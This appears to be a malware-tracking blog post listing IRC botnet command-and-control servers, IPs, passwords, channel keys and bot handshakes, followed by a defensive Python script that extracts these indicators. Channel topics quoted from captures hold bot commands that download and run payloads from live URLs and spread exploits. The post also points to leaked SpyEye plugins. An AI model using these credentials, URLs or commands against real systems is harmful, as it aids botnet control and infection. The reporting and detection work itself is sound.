Interesting malware. Here are some details I pulled from the exe:
DNS lookup: a.ip-163.com DNS_TYPE_A 174.139.61.74
What it does:
Writes to foreign memory areas: the executable tampers with the execution of another process.
Performs file modification and destruction: the executable modifies and destroys files which are not temporary.
Starts/installs a Windows service: the executable starts a Windows service.
Services
31.186.102.186 (IRC botnet hosted in Russian Federation, Selectel Ltd)
Remote host / port:
199.15.234.7 80
31.186.102.186 8765
IRC handshake:
PASS secret
NICK n{US|XPa}vhxkqvn
USER vhxkqvn 0 0 :vhxkqvn
JOIN #GODS secret
Hosting info: http://whois.domaintools.com/31.186.102.186
SpyEye Plugins
Here are some plugins used by the well-known SpyEye malware, found by formatme and already public on Russian forums. Reversing guys will have a good time with this package. Guess what? They're backdoored, like everything leaked to the public, so be careful.
www.merkurvideo.com (IRC botnet hosted in Turkey, Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Domains used to control bots:
www.facebookvideocentral.com 46.45.164.166
www.merkurvideo.com 46.45.164.166
www.pr0.net 74.206.242.164
C&C Server: 46.45.164.166:81
Server Password:
Username: SP3-431
Nickname: [00_DEU_XP_6037696]
Channel: #i (Password: )
Channel topic: :.asc -S -s |.http http://46.45.164.165/iii.exe |.asc exp_all 15 5 0 -c -e |.asc exp_all 15 5 0 -b -r -e |.asc exp_all 15 5 0 -c |.asc exp_all 10 5
xL.x1x2.in (ngrBot hosted in France, Paris, Gandi)
Resolved: [xL.x1x2.in] to [95.142.167.131], port 4949 for IRC
Resolved: [xL.x1x2.in] to [95.142.166.253], port 4949 for IRC
Resolved: [xL.x1x2.in] to [92.243.15.137], port 4949 for IRC
Resolved: [xL.x1x2.in] to [103.1.184.45], port 4949 for IRC
Remote host / port:
176.9.42.247 8332 (Bitcoin malware)
199.15.234.7 80
199.7.176.144 80
199.7.177.228 80
74.120.10.153 80
74.120.8.161 80
95.142.167.131 4949 (IRC port, before
118.69.220.81 (IRC botnet hosted in Viet Nam, Ip Range For Xdsl Iptv Fixed Phone Service At Hcmc)
Remote host / port: 118.69.220.81 6667
PASS weed
Server LUSERS reply (bot count):
Clients: I have 110 clients and 0 servers
Local users: Current Local Users: 110 Max: 115
Global users: Current Global Users: 110 Max: 115
Client commands:
MODE [00|USA|XP|SP2]-8799 +x
JOIN ##vam## vampir123
USERHOST [00|USA|XP|SP2]-8799
PONG :Vampir.hack-mx.ru.net
NICK [00|USA|XP|SP2]-8799
USER pmlai 0 0 :[00|USA|XP|SP2]-8799
Hosting info: http://whois.domaintools.com/118.69.220.81
picasa.com.syscommx.com (hecker using United States, Fulshear, Landis Holdings Inc)
Today I noticed that a big hecker tried to heck into one of my websites. Here I'm posting the script used to attack the website; you have to decrypt it if you want to know more, lol. First he uses this website to host his shit: http://picasa.com.syscommx.com/ and his l33t hecker script is
205.234.187.241 (IRC botnet hosted in United States, Chicago, Hostforweb Inc)
C&C Server: 205.234.187.241:2345
Nick: New[AUT|00|P|64491]
Username: XP-9383
Joined channel: #!loco!
Channel topic for #!loco!: ".m.s|.m.e Foto http://goo.gl/TYFFS?="
Private message to channel #!loco!: "[M]: Thread Activated: Sending Message With Email."
Private message to channel #!loco!: "[M]: Thread Disabled."
Private message to user New[AUT|00|P|64491]: ".hp http://domredi.com/1/"
Hosting info: http://whois.domaintools.com/205.234.187.241
31.210.98.14 (mIRC bots hosted in Turkey, Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Remote host / port: 31.210.98.14 6667
NICK Maceachern
PING Maceachern
NICK _A_R_Z_U_
USER Woods-Powe "" "p2c.ekolik.net" :biliamee
USERHOST _A_R_Z_U_
MODE #seo
JOIN #!x!
MODE #!x!
USER Peters "" "p2c.ekolik.net" :coralyn
PING _A_R_Z_U_
USERHOST Maceachern
Hosting info: http://whois.domaintools.com/31.210.98.14
2.byinter.net (ngrBot hosted in United States, Stafford, Singlehop Inc)
C&C Server: 69.175.32.237:6667
Server Password:
Username: msgvvei
Nickname: A[DE-XPC]msgvvei
Channel: #KCA (Password: KCA)
Channel topic: :!j #X
Now talking in #X
Topic on [ #X ]: [ !j #XX !mdns http://69.175.32.237/~face/av.txt !mod usbi on ]
Topic by: [ KCA ]
UPDATE:
PRIVMSG #aryan :[AryaN]: Successfully Executed Process: "C:\Documents and Settings\UserName\Application Data\10915679120753.exe"
NICK A[US-XPC]zjqsrws
USER zjqsrws 0
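Every IRC bot in the posts above gives itself away in the first few lines it sends: a PASS before NICK, a nick built from a bracketed country/OS tag plus a random suffix (n{US|XPa}vhxkqvn, [00|USA|XP|SP2]-8799, A[DE-XPC]msgvvei), a JOIN with a channel key, and payload URLs pushed through the channel topic. The following script is an added example, not code from this blog: it takes handshakes in the flattened form the sandbox printed them and pulls out the server, password, nick, ident, channels and topic URLs, and flags nicks that look machine-generated. The SAMPLES dictionary is constructed from the captures quoted on this page (the mIRC clone on 31.210.98.14, with its human-looking nicks, is the negative case); the regexes and the bot-nick heuristic are my own assumptions, not anything the bot authors or the blog defined.

```python
"""Pull IRC C&C indicators out of flattened bot handshakes.

Added example, not code from the blog. SAMPLES is constructed from the
handshakes quoted on the page, re-typed as a sandbox or pcap would give
them: server endpoint plus the client's IRC commands on one line.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed from the page's own captures. 31.210.98.14 is the mIRC
# clone with human-looking nicks and no PASS: the negative case.
SAMPLES = {
    "31.186.102.186:8765": "PASS secret NICK n{US|XPa}vhxkqvn USER vhxkqvn 0 0 "
                           ":vhxkqvn JOIN #GODS secret",
    "118.69.220.81:6667": "PASS weed MODE [00|USA|XP|SP2]-8799 +x JOIN ##vam## vampir123 "
                          "USERHOST [00|USA|XP|SP2]-8799 PONG :Vampir.hack-mx.ru.net "
                          "NICK [00|USA|XP|SP2]-8799 USER pmlai 0 0 :[00|USA|XP|SP2]-8799",
    "69.175.32.237:6667": "NICK A[DE-XPC]msgvvei USER msgvvei 0 0 :msgvvei JOIN #KCA KCA",
    "31.210.98.14:6667": "NICK Maceachern PING Maceachern NICK _A_R_Z_U_ USER Woods-Powe "
                         '"" "p2c.ekolik.net" :biliamee MODE #seo JOIN #!x! MODE #!x!',
}

# Client commands seen in these captures. USERHOST precedes USER so the
# alternation cannot split it into USER + HOST.
CMD = re.compile(r"\b(PASS|NICK|USERHOST|USER|JOIN|MODE|PONG|PING|PRIVMSG)\b")
# Heuristic (assumption): a bot nick carries a [..] or {..} tag of |, - or _
# separated fields, one of which is a 2-3 letter upper-case country/OS code.
TAG = re.compile(r"[\[{]([^\]}]+)[\]}]")
CODE = re.compile(r"^[A-Z]{2,3}$")
URL = re.compile(r"https?://[^\s\]|]+")


@dataclass
class Beacon:
    server: str
    password: Optional[str] = None
    nick: Optional[str] = None
    ident: Optional[str] = None
    channels: List[Tuple[str, Optional[str]]] = field(default_factory=list)
    bot_nick: bool = False


def split_commands(flat: str) -> List[Tuple[str, str]]:
    """'PASS x NICK y ...' -> [('PASS', 'x'), ('NICK', 'y'), ...]."""
    parts = CMD.split(flat)  # [leading text, cmd, args, cmd, args, ...]
    return [(parts[i], parts[i + 1].strip()) for i in range(1, len(parts), 2)]


def looks_like_bot_nick(nick: str) -> bool:
    m = TAG.search(nick)
    if not m:
        return False
    fields = re.split(r"[|_-]", m.group(1))
    return len(fields) >= 2 and any(CODE.match(f) for f in fields)


def parse_beacon(server: str, flat: str) -> Beacon:
    b = Beacon(server=server)
    for cmd, args in split_commands(flat):
        toks = args.split()
        if not toks:
            continue
        if cmd == "PASS":
            b.password = toks[0]
        elif cmd == "NICK":
            b.nick = toks[0]  # last NICK wins, as it does on the server
        elif cmd == "USER":
            b.ident = toks[0]
        elif cmd == "JOIN":
            b.channels.append((toks[0], toks[1] if len(toks) > 1 else None))
    b.bot_nick = bool(b.nick) and looks_like_bot_nick(b.nick)
    return b


def topic_urls(topic: str) -> List[str]:
    """Payload URLs pushed through the channel topic (.http / !mdns style)."""
    return URL.findall(topic)


def iocs(samples=SAMPLES) -> List[dict]:
    out = []
    for server, flat in samples.items():
        b = parse_beacon(server, flat)
        out.append({"server": server, "password": b.password, "nick": b.nick,
                    "ident": b.ident, "channels": b.channels, "bot_nick": b.bot_nick})
    return out


if __name__ == "__main__":
    for row in iocs():
        print(row)
    print(topic_urls("[ !j #XX !mdns http://69.175.32.237/~face/av.txt !mod usbi on ]"))
```

The nick heuristic is deliberately loose: it catches the country/OS-tagged nicks of the ngrBot and generic IRC bots above but not the mIRC clone, which copies real-looking names. For that family the better signal is the USER line (a fixed fake hostname like p2c.ekolik.net) and the fact that the same host re-registers under several nicks within seconds.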